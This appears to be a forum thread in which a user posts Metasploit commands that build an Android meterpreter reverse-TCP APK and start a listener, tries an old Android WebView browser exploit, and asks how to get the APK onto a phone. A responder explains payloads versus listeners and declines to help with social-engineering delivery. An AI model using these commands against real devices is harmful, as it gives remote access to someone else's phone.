Hi, I have Kali Linux 2017.3 and the Metasploit Framework version is metasploit v4.16.15-dev.
I write:
msfvenom -p android/meterpreter/reverse_tcp LHOST=(myip) LPORT=4444 R > msfandroid.apk
msfconsole
use exploit /multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST (myip)
set LPORT 4444
exploit
But I receive this message:
* Exploit running as background job 0.
* Started reverse TCP handler on (myip):4444
I receive a similar message using
use exploit/android/browser/webview_addjavascriptinterface
and setting the other parameters.
How can I solve this?
Another question, where is the .apk file on the android phone after the 'exploit' command?
8 Responses
Before you continue I would advise you to do a little research on what Exploits are as well as payloads and listeners. You seem to be confusing them a little.
I'll explain what you are doing to help you. Your command using msfvenom is creating a payload. Your commands after Msfconsole is you setting up your listener.
To get access to the device, you would send your created payload (In your case, the Apk) to your target. This would be the phone you are trying to get access to. Your listener will be set up listening for a connection back. It will send the connection back when the payload is open/installed on the target device.
how could I send the payload?
That's up to you to figure out. If you are doing this legally you would have access to the device already and can simply send the Apk in a text message or transfer it through Bluetooth or connecting it to the computer. If you are trying to do this illegally, you will need to do some socal engineering to get your target to run the Apk file, but doing it this way I can offer no help.
But to do so by sending it as a message, simply send it by copying and pasting the .apk file as a message or as an attachment?
And how could you do by sending a simple link. I tried with
use exploit / android / browser / webview_addjavascriptinterface?
I tried with
msfconsole
use exploit / android / browser / webview_addjavascriptinterface
set lhost (myip)
set srvhost (myip)
URIPATH set / (something)
exploit (or run)
But it always shows: "Exploit running as background job 0."
I think that pre-run everything I have to solve this error, that is when there will be no more 0.
Again, please do some research before continuing. That exploit is not what you think it is. That exploit is from 2012 and requires a vulnerability in the Android web browser of some Android phones running Android 4.2 and lower.
Thanks so much
Would you have any advice to give me besides doing research?
Share Your Thoughts